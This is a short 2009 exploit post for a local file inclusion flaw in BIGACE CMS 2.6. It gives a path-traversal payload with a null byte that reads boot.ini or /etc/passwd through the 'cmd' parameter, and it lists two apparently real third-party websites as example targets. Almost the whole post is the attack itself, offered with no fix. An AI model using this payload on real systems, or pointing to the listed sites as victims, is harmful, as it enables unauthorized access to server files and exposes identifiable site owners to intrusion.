BIGACE CMS 2.6 (cmd) Local File Inclusion Vulnerability

2009-06-30 20:42:23

-----------------:LFI:----------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------
script : BIGACE 2.6

download : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip

Author : CWD@rBe

Special Thanks : www.cyber-warrior.org

***************************************************************************************************************
exploit:

http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len

example sites

1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len

2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len

****************************************************************************************************************

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.